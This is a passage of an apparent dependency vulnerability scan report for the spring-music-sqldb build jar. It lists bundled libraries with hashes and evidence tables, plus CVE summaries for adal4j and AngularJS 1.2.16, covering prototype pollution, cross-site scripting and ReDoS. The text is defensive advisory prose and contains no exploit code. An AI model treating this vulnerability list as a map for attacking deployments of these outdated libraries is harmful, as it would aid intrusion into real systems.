authentication to your web application with just a few lines of additional code. Using our ADAL SDKs you
can quickly and easily extend your existing application to all the employees that use Windows Azure
AD and Active Directory on-premises using Active Directory Federation Services, including Office365
customers.
License:
MIT License File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/adal4j-1.6.0.jar
MD5: ea5ee234502edd75d6b60704eff6028d
SHA1: 5075875d651ed11b59f4053cd033ceb8bbc1a8e3
SHA256: f3f8195752c98cac306617363ccf0ef19a0475af3960ee1847b929e77fb63eac
Evidence Type Source Name Value Confidence Vendor file name adal4j High Vendor jar package name adal4j Highest Vendor jar package name microsoft Highest Vendor Manifest Implementation-Vendor-Id com.microsoft.azure Medium Vendor pom artifactid adal4j Low Vendor pom developer id msopentech Medium Vendor pom developer name Microsoft Open Technologies, Inc. Medium Vendor pom groupid com.microsoft.azure Highest Vendor pom name adal4j High Vendor pom url AzureAD/azure-activedirectory-library-for-java Highest Product file name adal4j High Product jar package name adal4j Highest Product jar package name microsoft Highest Product Manifest Implementation-Title adal4j High Product Manifest specification-title adal4j Medium Product pom artifactid adal4j Highest Product pom developer id msopentech Low Product pom developer name Microsoft Open Technologies, Inc. Low Product pom groupid com.microsoft.azure Highest Product pom name adal4j High Product pom url AzureAD/azure-activedirectory-library-for-java High Version file version 1.6.0 High Version Manifest Implementation-Version 1.6.0 High Version pom version 1.6.0 Highest
CVE-2021-42306 suppress
An information disclosure vulnerability manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential  on an Azure AD Application or Service Principal (which is not recommended). This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application.
Azure AD addressed this vulnerability by preventing disclosure of any private key values added to the application.
Microsoft has identified services that could manifest this vulnerability, and steps that customers should take to be protected. Refer to the FAQ section for more information.
For more details on this issue, please refer to the MSRC Blog Entry.
CWE-522 Insufficiently Protected Credentials
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: adapter-rxjava-2.1.0.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/adapter-rxjava-2.1.0.jarMD5: 2c148d6edaddd4dc63e00947550e1bd5SHA1: 693eddc23e87ab13f9cf5001707ce8e7e1d1ff01SHA256: 30d08849b7382549243e8a7b65c7cbcd8b1f30c97e03153d0211f87efd7be4c1
Evidence Type Source Name Value Confidence Vendor file name adapter-rxjava High Vendor jar package name adapter Highest Vendor jar package name adapter Low Vendor jar package name retrofit2 Highest Vendor jar package name retrofit2 Low Vendor jar package name rxjava Highest Vendor jar package name rxjava Low Vendor pom artifactid adapter-rxjava Low Vendor pom groupid com.squareup.retrofit2 Highest Vendor pom name Adapter: RxJava High Vendor pom parent-artifactid retrofit-adapters Low Product file name adapter-rxjava High Product jar package name adapter Highest Product jar package name adapter Low Product jar package name retrofit2 Highest Product jar package name rxjava Highest Product jar package name rxjava Low Product pom artifactid adapter-rxjava Highest Product pom groupid com.squareup.retrofit2 Highest Product pom name Adapter: RxJava High Product pom parent-artifactid retrofit-adapters Medium Version file version 2.1.0 High Version pom version 2.1.0 Highest
spring-music-sqldb-1.0.jar: angular-ui-0.4.0-2.jarDescription:
WebJar for AngularUI License:
MIT License: https://github.com/angular-ui/angular-ui/blob/master/LICENSE File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-0.4.0-2.jar
MD5: 040d7d520f8bec40e6cb91514bc1212e
SHA1: 8deff747c57910574bfa757abce9e1873dc015ce
SHA256: 61698ce01faa019cbe1a4aacd68163f70d4d16d0f4f4d1dd54e7d19fb928f886
Evidence Type Source Name Value Confidence Vendor file name angular-ui High Vendor pom artifactid angular-ui Low Vendor pom developer email james@jamesward.org Low Vendor pom developer email mabuzer@alz-inc.com Low Vendor pom developer id jamesward Medium Vendor pom developer id mabuzer Medium Vendor pom developer name James Ward Medium Vendor pom developer name Mohammad M. AbuZer Medium Vendor pom groupid org.webjars Highest Vendor pom name AngularUI High Vendor pom url http://webjars.org Highest Product file name angular-ui High Product pom artifactid angular-ui Highest Product pom developer email james@jamesward.org Low Product pom developer email mabuzer@alz-inc.com Low Product pom developer id jamesward Low Product pom developer id mabuzer Low Product pom developer name James Ward Low Product pom developer name Mohammad M. AbuZer Low Product pom groupid org.webjars Highest Product pom name AngularUI High Product pom url http://webjars.org Medium Version pom version 0.4.0-2 Highest
spring-music-sqldb-1.0.jar: angular-ui-0.4.0-2.jar: angular-ui-ieshiv.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-0.4.0-2.jar/META-INF/resources/webjars/angular-ui/0.4.0/angular-ui-ieshiv.jsMD5: db2961939a0a8ea4fa8cd627fa8ebd42SHA1: d3f1375472c9d88157cdee8a410ebaf092429d53SHA256: 269c614f28c2a9470a6f1c3642a1734986a949f9272a0ce52e1c9d7eb888028f
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-0.4.0-2.jar: angular-ui-ieshiv.min.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-0.4.0-2.jar/META-INF/resources/webjars/angular-ui/0.4.0/angular-ui-ieshiv.min.jsMD5: f77a7f92be3f43f1770740a1bc4a36d1SHA1: 1d2a9dbbb947fa7d245beb6fe0e45269d099fcb4SHA256: 66a6f6df130eaef6d1c61bddbcfb21e863c070d1fb87f5cb6fe11a58f17242d3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-0.4.0-2.jar: angular-ui.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-0.4.0-2.jar/META-INF/resources/webjars/angular-ui/0.4.0/angular-ui.jsMD5: 78d98a029a2b7721c92c1d8fd61238d5SHA1: 6de051ea1e3fc9891b1da1c57bb7c06ff3203c6eSHA256: f9d01b24e8e56ae4378443ebc65513c322aeb5af28f5cb6364ec02e077f7fcaa
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-0.4.0-2.jar: angular-ui.min.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-0.4.0-2.jar/META-INF/resources/webjars/angular-ui/0.4.0/angular-ui.min.jsMD5: b33f486ae57ed694809e6eaad880be82SHA1: 0a5a807ead812ec3bd0b9ce8512aefc61fc7a877SHA256: a410f8bf4a06b2ffd097fd7630c761dee535c9fdbe4e0f0de309b33525f7adb3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-0.4.0-2.jar: webjars-requirejs.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-0.4.0-2.jar/META-INF/resources/webjars/angular-ui/0.4.0/webjars-requirejs.jsMD5: edb68afe6f8ceec99a4fb9f33632b6e4SHA1: b3732c46dd14c6c09e68fe83029872838639343bSHA256: 51e31f0b6e46545f6b293ed4cc1688adae02386e2c5dde9530f238ccedfa4b8b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-bootstrap-0.10.0-1.jarDescription:
WebJar for Angular UI Bootstrap License:
MIT License: https://github.com/angular-ui/bootstrap/blob/master/LICENSE File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-bootstrap-0.10.0-1.jar
MD5: 85ab8f59807a4097e7706c7305d3fd4c
SHA1: 36425a16aca739ff1123661fa763333142bdf311
SHA256: a1a10220615d75ff46f0315e3e575f1dff8738102ac7e2676e225beb73bb3fb2
Evidence Type Source Name Value Confidence Vendor file name angular-ui-bootstrap High Vendor pom artifactid angular-ui-bootstrap Low Vendor pom developer email small.guo@enovation.com.cn Low Vendor pom developer id smallg Medium Vendor pom developer name Small Guo Medium Vendor pom groupid org.webjars Highest Vendor pom name Angular Ui Bootstrap High Vendor pom url http://webjars.org Highest Product file name angular-ui-bootstrap High Product pom artifactid angular-ui-bootstrap Highest Product pom developer email small.guo@enovation.com.cn Low Product pom developer id smallg Low Product pom developer name Small Guo Low Product pom groupid org.webjars Highest Product pom name Angular Ui Bootstrap High Product pom url http://webjars.org Medium Version pom version 0.10.0-1 Highest
spring-music-sqldb-1.0.jar: angular-ui-bootstrap-0.10.0-1.jar: ui-bootstrap-tpls.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-bootstrap-0.10.0-1.jar/META-INF/resources/webjars/angular-ui-bootstrap/0.10.0/ui-bootstrap-tpls.jsMD5: 5274f0a1f411f1e8a7f7eae0620361fdSHA1: e21e017665abea9cc2f06f06286fc5b28e2fc117SHA256: 769d5f32ce5fcbb7883b88bb39d748a6e994893ebb024627d76410fc9bcdc7aa
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-bootstrap-0.10.0-1.jar: ui-bootstrap-tpls.min.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-bootstrap-0.10.0-1.jar/META-INF/resources/webjars/angular-ui-bootstrap/0.10.0/ui-bootstrap-tpls.min.jsMD5: 148a1e75b8734cd4b72269e2c9aec02dSHA1: 91d6e5c34f69c59f3c6627a212c5504ab4131343SHA256: 9ac24f79e71caa6403f3417d207e60368f3e01dae2765c6172c8fceea2f3721b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-bootstrap-0.10.0-1.jar: ui-bootstrap.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-bootstrap-0.10.0-1.jar/META-INF/resources/webjars/angular-ui-bootstrap/0.10.0/ui-bootstrap.jsMD5: 9b97833cf878ec391e87ead3669b50fcSHA1: 63fd5ee6b3d4daf60613139f2ae0a442d8fd80e2SHA256: 900b2db42ca78a4238c14dfdcf7fb801f57387d25495fa4735f6c82255c48d0b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-bootstrap-0.10.0-1.jar: ui-bootstrap.min.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-bootstrap-0.10.0-1.jar/META-INF/resources/webjars/angular-ui-bootstrap/0.10.0/ui-bootstrap.min.jsMD5: 257ab601ed6a20539186c31ac61aea12SHA1: c39771e87b36d9abbf56aae2c76404090550330dSHA256: 7ea610a66460266f2e709ec9360f69317dae6865c0d6e5c4275e49a15966c497
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angular-ui-bootstrap-0.10.0-1.jar: webjars-requirejs.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angular-ui-bootstrap-0.10.0-1.jar/META-INF/resources/webjars/angular-ui-bootstrap/0.10.0/webjars-requirejs.jsMD5: 5dade7519d4cb0442bc701e1c1884a09SHA1: ce306175f45b2c6ab4a1d49f82e41f2d1e8c17c0SHA256: f1eb6d709cfb26e227d72e601eed63f6d455080eee0790ee6f6b1a18c0436d97
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jarDescription:
WebJar for AngularJS License:
MIT License: https://github.com/angular/angular.js/blob/master/LICENSE File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar
MD5: a5ee8f1a710c9ace3ca3f85b25307c4f
SHA1: 2a2d9eb9506e014fca469f2669697474c777a8c2
SHA256: 5bb4f6167d282e263d4719a87c33e508a6b089610192224b96548fbff847d196
Evidence Type Source Name Value Confidence Vendor file name angularjs High Vendor pom artifactid angularjs Low Vendor pom developer email james@jamesward.org Low Vendor pom developer id jamesward Medium Vendor pom developer name James Ward Medium Vendor pom groupid org.webjars Highest Vendor pom name AngularJS High Vendor pom url http://webjars.org Highest Product file name angularjs High Product pom artifactid angularjs Highest Product pom developer email james@jamesward.org Low Product pom developer id jamesward Low Product pom developer name James Ward Low Product pom groupid org.webjars Highest Product pom name AngularJS High Product pom url http://webjars.org Medium Version file version 1.2.16 High Version pom version 1.2.16 Highest
CVE-2019-10768 suppress
In AngularJS before 1.7.9 the function `merge()` could be tricked into adding or modifying properties of `Object.prototype` using a `__proto__` payload. CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions up to (excluding) 1.7.9 CVE-2022-25869 suppress
All versions of package angular are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* CVE-2019-14863 (OSSINDEX) suppress
angular - mutation Cross-Site Scripting (mXSS) [CVE-2019-14863]
The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (5.400000095367432) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.webjars:angularjs:1.2.16:*:*:*:*:*:*:* CVE-2020-7676 suppress
angular.js prior to 1.8.0 allows cross site scripting. The regex-based input HTML replacement may turn sanitized code into unsanitized one. Wrapping "<option>" elements in "<select>" ones changes parsing behavior, leading to possibly unsanitizing code. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (5.4) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:2.3/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:P/A:N References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions up to (excluding) 1.8.0 CVE-2023-26116 suppress
Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking. CWE-1333 Inefficient Regular Expression Complexity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY info - https://github.com/advisories/GHSA-2vrf-hf26-jrp5 report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - MAILING_LIST,THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* versions from (including) 1.2.21; versions up to (including) 1.8.3 CVE-2023-26117 suppress
Versions of the package angular from 1.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the $resource service due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking. CWE-1333 Inefficient Regular Expression Complexity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY info - https://github.com/advisories/GHSA-2qqx-w9hr-q5gx report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - MAILING_LIST,THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* versions from (including) 1.0.0; versions up to (including) 1.8.3 CVE-2023-26118 suppress
Versions of the package angular from 1.4.9 are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking. CWE-1333 Inefficient Regular Expression Complexity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY info - https://github.com/advisories/GHSA-qwqh-hm9m-p5hr report@snyk.io - EXPLOIT report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - MAILING_LIST,THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* versions from (including) 1.4.9; versions up to (including) 1.8.3 CVE-2024-8373 suppress
Improper sanitization of the value of the [srcset] attribute in <source> HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing https://owasp.org/www-community/attacks/Content_Spoofing .
This issue affects all versions of AngularJS.
Note:
The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see here https://docs.angularjs.org/misc/version-support-status . CWE-791 Incomplete Filtering of Special Elements, NVD-CWE-Other
CVSSv3:
Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions up to (including) 1.8.3 cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vsphere:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:* Cross-Site Scripting via JSONP (RETIREJS) suppress
Cross-Site Scripting via JSONP Unscored:
References:
DOS in $sanitize (RETIREJS) suppress
DOS in $sanitize Unscored:
References:
The attribute usemap can be used as a security exploit (RETIREJS) suppress
The attribute usemap can be used as a security exploit Unscored:
References:
Universal CSP bypass via add-on in Firefox (RETIREJS) suppress
Universal CSP bypass via add-on in Firefox Unscored:
References:
XSS via JQLite DOM manipulation functions in AngularJS (RETIREJS) suppress
XSS via JQLite DOM manipulation functions in AngularJS Unscored:
References:
CVE-2025-0716 (RETIREJS) suppress
Unscored:
References:
End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021 (RETIREJS) suppress
End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021 Unscored:
References:
XSS in $sanitize in Safari/Firefox (RETIREJS) suppress
XSS in $sanitize in Safari/Firefox Unscored:
References:
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_af-na.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_af-na.jsMD5: 52b062dd8460f895f78ae2922afe5370SHA1: 622a9a950180ca89bf8f82bd07fe996423fe4ebcSHA256: 1831a93e826ce84debe66b59ec226ac6e391fe32fe8840903a65bec37acdc269
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_af-za.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_af-za.jsMD5: cf53af59608ac752371295d59b95d08fSHA1: 8bfad7c9c006907bef603878e97342b34d830a82SHA256: be3389407f81b5acca6fed92bd760f76dea55c24a1b3ec458c1bb4c5a692907f
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_af.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_af.jsMD5: 33952d0b922128a216b50dcc714135deSHA1: 8b3817b599f1a62f1e20bd283e48944b6eb34b06SHA256: e9b66ef1fa1d2ee2ba2d1cb997158f666f4d43bb5e6593f9e7d71ed896d7030d
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_am-et.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_am-et.jsMD5: 94736b059106c512be99a2196eec426fSHA1: df7e37b8227a028e7de18bd5495586cb74f3932fSHA256: d5781adba452ed3ea8b0e5f9907c4b7dd18aeb4958b8b318aa0fd9a035976ce3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_am.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_am.jsMD5: 426072230e164a917397ea64a64e84efSHA1: a57f29cf3958ece77643e058dd5a8d78946ef7b3SHA256: 84f6ed6d738430f6a8023cac92979504ff5842081118a54df144f352545c3773
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-001.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-001.jsMD5: 2503eb8d5dc0dda7935562da1b8c3b05SHA1: c040b61fafc48f22d225254752851c9cf710ba51SHA256: 7dc884b5378938a55546d4c2e522e5be0c33e6a06c10297d78fb8f974a327aa1
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-ae.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-ae.jsMD5: d3f4c9a3e30d6bf510c4102c75a8e5e6SHA1: b60262eb0996094e657f57b0792f7ff8444d9a58SHA256: 0b59d0fbacabbbc4f82d2371af52ff68ad24f05a6953aaeb733fd51081d022ad
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-bh.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-bh.jsMD5: 13b2e13d7c0cd1444f9638c1898cdffeSHA1: e0eb25e81a1358dbc67b2c21abb2072a06ab39ffSHA256: c773e4e8ab72cc9b46840e3f9261f66c033bf49be4ffecf6fd8af5cb44b6aed5
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-dz.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-dz.jsMD5: d8cf5006ec70a6239d59b9f08ebd4453SHA1: da114d7b8ae9a899520aa0285970641e1058b97fSHA256: 3f8c6a901f0dd155da1171ba1ca305af4c7c8a0de2d5afade2f3d264f9ecedb1
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-eg.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-eg.jsMD5: b47b19ba698a4ec838a477682500ee33SHA1: d090901c55a8c12857bc9bb5515418994e1de15dSHA256: 3cd88d750d9bcba755c91ed0d41522cb0ea8cbca56bec4d5bfd0dc2c176a02ca
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-iq.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-iq.jsMD5: e143918a9751017d8a8398b612f28708SHA1: b469414b5493254a9dbd32493e50ae197258a17bSHA256: 41c5ab7033f462a9eee3bebd380f140a47d51b25b2690a282d9fe70d0c0480f8
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-jo.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-jo.jsMD5: 333f52ab5f556e4615c6b0e90175adc3SHA1: 2812afc8efe97bca8430ba19791f544e0602923dSHA256: d501ccedf6b7c2c8efbdef4886ba7081aa1c10ff71bbb9dd08f809eea71ff03c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-kw.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-kw.jsMD5: 181dbddc1db603a6d4f0730faefbd310SHA1: 2b4378fa3d06562cceaaaf9932163fc9be63fd34SHA256: 7326112f7a25070b9f9374035eaabfd7673d040a7e451745d14239a575648aa0
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-lb.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-lb.jsMD5: 7c8849ea2b46f1a5de071e42d53e8d12SHA1: 8fe79317aca39e06a6e85f6675a8bbb6ac409672SHA256: d1ecda94e4631bacc277fc9c5f3f29862d185d48c6b6fa85983b0a9554ad1868
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-ly.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-ly.jsMD5: e6cce31a43739f6cda94ab6600fc1b82SHA1: 08a932e7f93ed2f220ea678e1595345952a61021SHA256: b09d8a9dc41fe0da100c0725b98837f449c0500115a55eceba02a72d0629e30d
Evidence Type Source Name Value Confidence
